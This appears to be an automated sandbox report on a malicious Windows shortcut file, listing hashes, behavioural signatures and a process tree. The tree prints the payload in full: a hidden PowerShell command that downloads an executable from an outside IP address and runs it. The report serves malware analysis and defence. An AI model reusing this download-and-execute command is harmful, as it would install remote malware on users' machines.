Analysis
-
max time kernel
117s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
06-12-2023 01:09
Static task
static1
Behavioral task
behavioral1
Sample
d3ab1b047a1ee9985c00c95cd4d205f79bdf47ade1f18ee30ec9d88a58cb133d.lnk
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
d3ab1b047a1ee9985c00c95cd4d205f79bdf47ade1f18ee30ec9d88a58cb133d.lnk
Resource
win10v2004-20231127-en
General
-
Target
d3ab1b047a1ee9985c00c95cd4d205f79bdf47ade1f18ee30ec9d88a58cb133d.lnk
-
Size
1KB
-
MD5
92cff55b70b6556b395300de968521fc
-
SHA1
4bfccd1a6dc2a775a497074caecf25386dab49fb
-
SHA256
d3ab1b047a1ee9985c00c95cd4d205f79bdf47ade1f18ee30ec9d88a58cb133d
-
SHA512
7b59f385a7bacba7a87479837218f1399894480f2b4ae60811d0c4ec180cfbfde6170ecb0b369f4dd0cd75af02a216b5659e714d7c53d439394664505a9311fe
Malware Config
Signatures
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2668 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2668 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 2696 wrote to memory of 2724 2696 cmd.exe cmd.exe PID 2696 wrote to memory of 2724 2696 cmd.exe cmd.exe PID 2696 wrote to memory of 2724 2696 cmd.exe cmd.exe PID 2724 wrote to memory of 2668 2724 cmd.exe powershell.exe PID 2724 wrote to memory of 2668 2724 cmd.exe powershell.exe PID 2724 wrote to memory of 2668 2724 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\d3ab1b047a1ee9985c00c95cd4d205f79bdf47ade1f18ee30ec9d88a58cb133d.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell.exe -windowstyle hidden -command "& {Invoke-WebRequest -Uri 'http://185.196.9.20/test/sleeps.exe' -OutFile $env:APPDATA\newfile.exe; Start-Process $env:APPDATA\newfile.exe}"2⤵
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden -command "& {Invoke-WebRequest -Uri 'http://185.196.9.20/test/sleeps.exe' -OutFile $env:APPDATA\newfile.exe; Start-Process $env:APPDATA\newfile.exe}"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2668